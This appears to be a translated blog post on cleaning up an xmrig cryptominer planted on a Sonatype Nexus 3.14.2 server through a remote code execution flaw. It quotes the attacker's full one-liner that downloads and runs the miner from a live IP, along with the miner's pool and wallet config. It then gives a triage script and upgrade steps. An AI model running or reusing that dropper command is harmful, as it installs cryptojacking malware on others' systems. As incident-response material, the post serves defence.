Tags: ini, ict, new version, cal, code execution, http, mode, 14., sys
The program being executed, xmrig, was found in the /var/tmp/ directory.
curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &
The contents of config.json are as follows:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": true, "colors": true, "cpu-affinity": null, "cpu-priority": 5, "donate-level": 1, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 95, "pools": [ { "url": "202.144.193.8:80", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null }, { "url": "185.161.70.34:3333", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null }, { "url": "202.144.193.110:3333", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null }, { "url": "205.185.122.99:3333", "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": { "cn": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "cn-lite": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "cn-heavy": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ] }, "algo-perf": { "cn": 2.0, "cn/2": 2.0, "cn/msr": 2.0, "cn-lite": 2.0, "cn-heavy": 2.0 }, 
"calibrate-algo": false, "calibrate-algo-time": 10, "user-agent": null, "syslog": false, "watch": false }
There is also another executable program, xrmrig; this program drives CPU usage to 100%.
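A triage sketch for the findings above, added here and not part of the original post: it lists executables dropped in a temp directory, processes still running from it, and the pool endpoints in any XMRig-style config, so they can be recorded and blocked at egress before the files are deleted. Function names are hypothetical, and the process check assumes a Linux /proc.

```shell
#!/bin/sh
# Added triage example, not from the original post; function names are hypothetical.

# Executable regular files in a directory that should hold no programs.
find_tmp_executables() {
    find "${1%/}" -xdev -type f -perm -100 2>/dev/null | sort
}

# Files that look like an XMRig config: text carrying both the "pools" and
# "donate-level" keys seen in the config.json above.
find_miner_configs() {
    find "${1%/}" -xdev -type f -size -1024k 2>/dev/null | sort |
    while IFS= read -r f; do
        if grep -q '"pools"' "$f" 2>/dev/null &&
           grep -q '"donate-level"' "$f" 2>/dev/null; then
            printf '%s\n' "$f"
        fi
    done
}

# Unique pool endpoints (host:port) from one config, for egress firewall
# rules or a search of flow logs.
extract_pool_endpoints() {
    grep -oE '"url"[[:space:]]*:[[:space:]]*"[^"]+"' "$1" |
        sed -E 's/^"url"[[:space:]]*:[[:space:]]*"([^"]+)"$/\1/' | sort -u
}

# "PID path" for every process whose executable lives under the directory.
# A binary deleted while running shows as "path (deleted)" and still matches.
procs_running_from() {
    dir=${1%/}
    for exe in /proc/[0-9]*/exe; do
        target=$(readlink "$exe" 2>/dev/null) || continue
        case "$target" in
            "$dir"/*) pid=${exe#/proc/}; printf '%s %s\n' "${pid%/exe}" "$target" ;;
        esac
    done
}

# Collect all three views for one directory, e.g. triage_dir /var/tmp
triage_dir() {
    echo "== executables in $1";            find_tmp_executables "$1"
    echo "== processes running from $1";    procs_running_from "$1"
    find_miner_configs "$1" | while IFS= read -r cfg; do
        echo "== pool endpoints in $cfg";   extract_pool_endpoints "$cfg"
    done
}
```

Run `triage_dir /var/tmp` as root so that /proc entries of every user are readable, and save the output with the incident record.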
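Delete the files under /var/tmp/, then upgrade the program. For an installation done with Docker, the upgrade is as follows:
docker pull docker.io/sonatype/nexus3   # automatically pulls the latest version
# if an old container named nexus3 still exists, remove it first, otherwise docker run fails with a name conflict
docker run -d -p 8081:8081 -p 5000:5000 --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3
Sonatype Nexus Repository Manager version 3.14.2: missing access control and remote code execution vulnerability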
Original article: https://www.cnblogs.com/linyouyi/p/10536342.html